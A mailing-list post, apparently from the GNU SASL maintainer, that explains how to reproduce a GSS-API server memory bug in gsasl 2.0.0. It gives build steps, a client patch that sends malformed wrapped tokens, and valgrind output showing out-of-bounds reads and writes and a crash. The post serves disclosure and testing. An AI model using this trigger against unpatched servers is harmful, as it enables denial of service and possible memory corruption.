[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Reproducing GSS-API server vulnerability
From: |
Simon Josefsson |
Subject: |
Reproducing GSS-API server vulnerability |
Date: |
Fri, 15 Jul 2022 20:27:49 +0200 |
User-agent: |
Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux) |
If anyone is interested in reproducing the problem it should be a matter
of the following (using vulnerable version 2.0.0 as an example):
./configure --with-gssapi-impl=mit
wget -O examples/smtp-server.c
https://gitlab.com/gsasl/gsasl/-/raw/v2.0.1/examples/smtp-server.c
make
./libtool --mode=execute valgrind examples/smtp-server &
Setting up GSS-API including a KDC is the complicated part, but use
inspiration from CI/CD rules [1].
Then patch the GSS-API client code like this, to create a malicious
client:
--- gsasl-2.0.0.orig/lib/gssapi/client.c 2022-06-18 22:56:43.000000000
+0200
+++ gsasl-2.0.0/lib/gssapi/client.c 2022-07-15 20:18:07.623425188 +0200
@@ -225,6 +225,7 @@
memcpy (q + 4, p, strlen (p));
}
+ bufdesc.length = 0;
maj_stat = gss_wrap (&min_stat, state->context, 0, GSS_C_QOP_DEFAULT,
&bufdesc, &conf_state, &bufdesc2);
free (bufdesc.value);
Then invoke
make
src/gsasl -m GSSAPI smtp.gsasl.example 2000 --smtp
you will get a nice valgrind output like this:
==719087== Invalid read of size 1
==719087== at 0x485DE9D: _gsasl_gssapi_server_step (server.c:228)
==719087== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==719087== by 0x109880: server_auth (smtp-server.c:120)
==719087== by 0x109880: smtp (smtp-server.c:196)
==719087== by 0x109880: main (smtp-server.c:322)
==719087== Address 0x4cd4a20 is 0 bytes after a block of size 0 alloc'd
==719087== at 0x483877F: malloc (vg_replace_malloc.c:307)
==719087== by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==719087== by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==719087== by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==719087== by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==719087== by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==719087== by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==719087== by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==719087== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==719087== by 0x109880: server_auth (smtp-server.c:120)
==719087== by 0x109880: smtp (smtp-server.c:196)
==719087== by 0x109880: main (smtp-server.c:322)
Using 'bufdesc.length = 3;' you trigger a more interesting output:
==715913== Invalid read of size 2
==715913== at 0x483CEE0: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913== by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913== Address 0x4cdcbe4 is 1 bytes after a block of size 3 alloc'd
==715913== at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913== by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==715913== by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==715913== by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==715913== by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==715913== by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==715913== by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==715913== by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913==
==715913== Invalid write of size 2
==715913== at 0x483CEE3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913== by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913== Address 0x4cdcc30 is 0 bytes after a block of size 0 alloc'd
==715913== at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913== by 0x484BD35: gsasl_property_set_raw (property.c:223)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913==
==715913== Invalid read of size 2
==715913== at 0x483CEEF: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913== by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913== Address 0x4cdcbe8 is 5 bytes after a block of size 3 alloc'd
==715913== at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913== by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==715913== by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==715913== by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==715913== by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==715913== by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==715913== by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==715913== by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913==
==715913==
==715913== Process terminating with default action of signal 11 (SIGSEGV)
==715913== Bad permissions for mapped region at address 0x5054000
==715913== at 0x483CEE3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913== by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
Continuing downhill from here is left as an exercise for the reader...
/Simon
[1] https://gitlab.com/gsasl/gsasl/-/blob/v2.0.1/.gitlab-ci.yml#L413
signature.asc
Description: PGP signature